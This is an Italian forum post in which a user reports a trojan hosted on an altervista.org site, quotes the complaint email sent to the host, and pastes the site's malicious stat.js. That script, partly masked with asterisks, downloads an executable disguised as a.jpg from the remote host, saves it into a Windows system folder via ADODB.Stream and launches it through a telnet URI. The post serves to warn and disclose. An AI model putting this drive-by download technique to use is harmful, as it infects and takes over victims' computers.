salve,
premetto che vi esorto a non aprire gli indirizzi che vi incollo di seguito poichè potreste infettarvi col suddetto trojan.

qualche giorno fa qualcuno ha tentato di infettarmi invitandomi ad aprire questa pagina ********.altervista.org (richiamata tramite frame nascosti su altri indirizzi).

avendo mozilla forse la cosa non è riuscita (a quanto pare tale trojan sfruttava vulnerabilità di internet explorer).

quindi dopo che mi hanno avvertito del pericolo, ho scritto una e-mail ai responsabili di altervista chiedendo l'immediata rimozioni di tali files e la chiusura di quell'account.

DOPO 9 GIORNI, non ho ricevuto alcuna risposta da parte dei responsabili di altervista.org.


Che altro posso fare?
A presto, Totò


vi posto la e-mail che ho inviato loro.

Dinstinta redazione di Altervista.org
in questi giorni alcune persone mi hanno segnalato questo sito. http://********.altervista.org invitandomi a visitarlo.
oggi alcune persone mi hanno avvertito della presenza di un trojan presente nelle pagine, quindi ho voluto controllare coi miei occhi tali pagine, sicuro di essere immune da attacchi propinati tramite pagine web.

la pubblicazione di questo sito con tale materiale atto ad accedere al pc dell'utente, sarebbe causa di denuncia per il webmaster, e forse anche per voi.

il file http://********.altervista.org/a.jpg altro non è che un "eseguibile" che consente di aprire un trojan nel pc della vittima.
lo script http://********.altervista.org/stat.js consentirebbe l'esecuzione di una sessione telnet che da accesso al pc

spero abbiate l'accortezza di agire contro i responsabili di tale reato (classificato come crimine informatico in quanto consente l'accesso al computer di una persona, e punibile per legge), quindi chiudere nel minor tempo possibile il sito.


Distinti saluti, Salvatore PECORARO



vi incollo una parte del testo contenuto nel file http://********.altervista.org/a.jpg
Í!¸LÍ!This program cannot be run in DOS mode.



vi incollo il contenuto del file http://********.altervista.org/stat.js

if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1) {
statpath="C:\\WINNT\\system32\\********";
} else if ((navigator.appVersion.indexOf("Windows 98")!=-1) || (navigator.appVersion.indexOf("Windows 95")!=-1) || (navigator.appVersion.indexOf("Win95")!=-1) || (navigator.appVersion.indexOf("Win98")!=-1)) {
statpath="C:\\WINDOWS\\*******";
} else if (navigator.appVersion.indexOf("XP")!=-1) {
statpath="C:\\WINDOWS\\system32\\********";
} else {
statpath="C:\\WINDOWS\\system32\\*********";
}

var m = new ***********("Microsoft.XMLHTTP");
m.Open("GET", "http://********.altervista.org/a.jpg",0);
m.Send();

function stat1() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }

var b = ******************
b.Mode = 3;
b.Type = 1;
b.Open();
b.Write(m.responseBody);

b.SaveToFile(statpath,2);
********** = "telnet://";

messaggio modificato